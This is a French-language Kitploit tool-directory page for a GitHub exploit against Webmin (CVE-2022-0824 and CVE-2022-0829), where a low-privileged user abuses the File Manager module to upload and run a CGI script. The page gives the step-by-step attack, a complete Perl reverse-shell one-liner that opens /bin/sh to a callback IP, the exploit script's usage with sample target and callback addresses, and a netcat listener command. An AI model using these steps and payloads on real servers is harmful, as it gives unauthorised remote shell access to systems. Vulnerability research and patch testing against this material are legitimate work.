Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WebminRCE-exploit — CVE-2022-0824, CVE-2022-0829, exploitation de privilèges du gestionnaire de fichiers | Kitploit
Outils/GitHubGitHub/gokul-ramesh/webminrce-exploit
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubgokul-ramesh/webminrce-exploit

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829, exploitation de privilèges du gestionnaire de fichiers

Voir le dépôt
2il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829 - Exploit de privilèges du File Manager

L'application vulnérable pour tester ce PoC peut être trouvée ici sous forme d'image Docker.
Prérequis :

  • Python3
  • Module Requests

Description

Vulnérabilité

Contrôle d'accès inapproprié permettant l'exécution de code à distance Les utilisateurs sûrs (utilisateurs non privilégiés) peuvent accéder au module File Manager, qui devrait être restreint par défaut.

Charge utile de l'exploit

Utilisez la vulnérabilité de contrôle d'accès inapproprié pour téléverser un fichier cgi sur le serveur Webmin.

Étape 1 (Authentification)

Authentifiez-vous et connectez-vous au serveur avec un utilisateur sûr/moins privilégié.

Étape 2 (Téléchargement d'un fichier sur le serveur)

Utilisez le module vulnérable File Manager (/file-manager/http_download.cgi) pour télécharger un script Perl sur le serveur.
Script Perl pour obtenir un accès shell inversé :
root@kitploit:~
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Étape 3 (Modifier les permissions)

Ajoutez la permission d'exécution au fichier (/file-manager/chmod.cgi)

Étape 4 (Exécuter la commande)

Appelez simplement le fichier téléversé pour exécuter le script de shell inversé qu'il contient.

Instructions d'utilisation :

root@kitploit:~
  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

Exemple d'utilisation :

root@kitploit:~
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
root@kitploit:~
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

Le nom d'utilisateur et le mot de passe concernent les utilisateurs sûrs (non privilégiés). Configurez un listener avant d'exécuter le script pour obtenir une connexion shell inversé.

root@kitploit:~
$ nc -lvp <port>

Merci à @faisalfs10x pour l'exploit.

Télécharger l’outil